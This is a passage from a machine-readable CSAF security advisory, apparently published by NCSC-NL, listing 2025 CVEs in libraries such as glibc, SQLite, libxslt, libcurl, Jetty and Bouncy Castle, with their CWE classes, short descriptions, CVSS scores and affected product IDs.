"text": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-4802 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-4802.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-4802"
},
{
"cve": "CVE-2025-5115",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "The \u0027MadeYouReset\u0027 vulnerability in HTTP/2 affects certain Jetty versions, allowing denial of service through malformed control frames, while additional vulnerabilities exist in Oracle Communications and SAP Commerce Cloud.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-5115 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-5115.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-5115"
},
{
"cve": "CVE-2025-5318",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle MySQL Workbench and the libssh library expose sensitive data and allow unauthorized access, with CVSS scores indicating moderate severity.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-5318 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-5318.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-5318"
},
{
"cve": "CVE-2025-5399",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"notes": [
{
"category": "other",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
},
{
"category": "description",
"text": "Multiple vulnerabilities in Oracle MySQL Server and Cluster, along with libcurl\u0027s WebSocket code, allow for various denial of service attacks, with CVSS scores ranging from 4.3 to 7.5.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-5399 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-5399.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-5399"
},
{
"cve": "CVE-2025-5889",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "The juliangruber brace-expansion library has a vulnerability in versions up to 4.0.0 affecting the expand function, while Oracle Communications Unified Assurance versions 6.1.0-6.1.1 are susceptible to a partial denial of service by low-privileged attackers.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-5889 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-5889.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.1,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-5889"
},
{
"cve": "CVE-2025-6965",
"cwe": {
"id": "CWE-197",
"name": "Numeric Truncation Error"
},
"notes": [
{
"category": "other",
"text": "Numeric Truncation Error",
"title": "CWE-197"
},
{
"category": "description",
"text": "Critical vulnerabilities in Oracle Communications Cloud Native Core and SQLite versions prior to 3.50.2 expose systems to severe risks, including memory corruption and integer truncation issues.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:L/U:Green",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-6965 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-6965.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-6965"
},
{
"cve": "CVE-2025-7339",
"cwe": {
"id": "CWE-241",
"name": "Improper Handling of Unexpected Data Type"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Unexpected Data Type",
"title": "CWE-241"
},
{
"category": "description",
"text": "Oracle Communications Unified Assurance has a vulnerability allowing unauthorized data access, while the on-headers middleware for Node.js has a bug affecting response header modifications in versions prior to 1.1.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-7339 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-7339.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.4,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-7339"
},
{
"cve": "CVE-2025-7425",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"notes": [
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Cloud Native Core and libxslt expose systems to unauthorized access and memory corruption, with significant impacts on integrity and availability.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-7425 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-7425.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-7425"
},
{
"cve": "CVE-2025-7962",
"cwe": {
"id": "CWE-147",
"name": "Improper Neutralization of Input Terminators"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input Terminators",
"title": "CWE-147"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Cloud Native Core Console and Jakarta Mail versions 2.0.2 and 2.2 expose systems to significant risks, including unauthorized access and SMTP Injection attacks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:L/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-7962 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-7962.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-7962"
},
{
"cve": "CVE-2025-8058",
"cwe": {
"id": "CWE-415",
"name": "Double Free"
},
"notes": [
{
"category": "other",
"text": "Double Free",
"title": "CWE-415"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Enterprise Operations Monitor and GNU C library versions 2.4 to 2.41 expose systems to potential unauthorized access, memory corruption, and denial of service risks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:L/VI:L/VA:H/SC:L/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-8058 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-8058.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.0,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-8058"
},
{
"cve": "CVE-2025-8916",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Bouncy Castle for Java and BCPKIX FIPS have a vulnerability allowing excessive resource allocation, while Oracle Communications Cloud Native Core Certificate Management and certain NetApp products face denial of service risks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/S:P/R:U/RE:M/U:Amber",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-8916 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-8916.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-8916"
},
{
"cve": "CVE-2025-9086",
"cwe": {
"id": "CWE-125",
